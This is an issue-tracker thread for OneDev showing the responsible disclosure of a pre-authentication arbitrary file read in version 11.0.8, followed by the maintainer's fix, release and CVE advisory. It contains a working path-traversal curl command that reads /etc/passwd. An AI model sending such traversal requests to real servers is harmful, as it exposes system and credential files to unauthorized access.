Arbitrary file reading exists in Onedev 11.0.8(latest) (OD-2050)
Siebene@ opened 1 year ago

Arbitrary file reading exists in Onedev 11.0.8(latest)

This vulnerability does not require authentication, it is pre-auth, and has a severe impact.

What steps will reproduce the problem?

  1. Assume there is a project named test.
  2. curl http://localhost:7576/test/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd poc1.PNG
  • Siebene@ changed fields 1 year ago
    Name Previous Value Current Value
    Assignee
    robin
    empty
  • Siebene@ changed fields 1 year ago
    Name Previous Value Current Value
    Assignee
    empty
    robin
  • Robin Shen commented 1 year ago

    Thank you. This will be fixed soon.

  • OneDev changed state to 'Closed' 1 year ago
    Previous Value Current Value
    Open
    Closed
  • OneDev commented 1 year ago

    State changed as code fixing the issue is committed (4637aaac)

  • OneDev changed state to 'Released' 1 year ago
    Previous Value Current Value
    Closed
    Released
  • OneDev commented 1 year ago

    State changed as build OD-5432 is successful

  • Siebene@ commented 1 year ago

    Hello, I would like to know if onedev will apply for a CVE for this issue. I hope to be credited under the name 'Siebene@'

  • Robin Shen commented 1 year ago

    Yes, I am requesting a CVE via GHSA. Will publish it after one month to give OneDev users a window to upgrade.

  • Robin Shen changed confidential 1 year ago
    Previous Value Current Value
    true
    false
  • Robin Shen commented 1 year ago

    @siebene I published the CVE and credited you: https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489

    Thanks again for your report.

issue 1/1
Type
Security Vulnerability
Priority
Critical
Assignee
Labels
No labels
Issue Votes (0)
Watchers (2)
Reference
OD-2050
Please wait...
Connection lost or session expired, reload to recover
Page is in error, reload to recover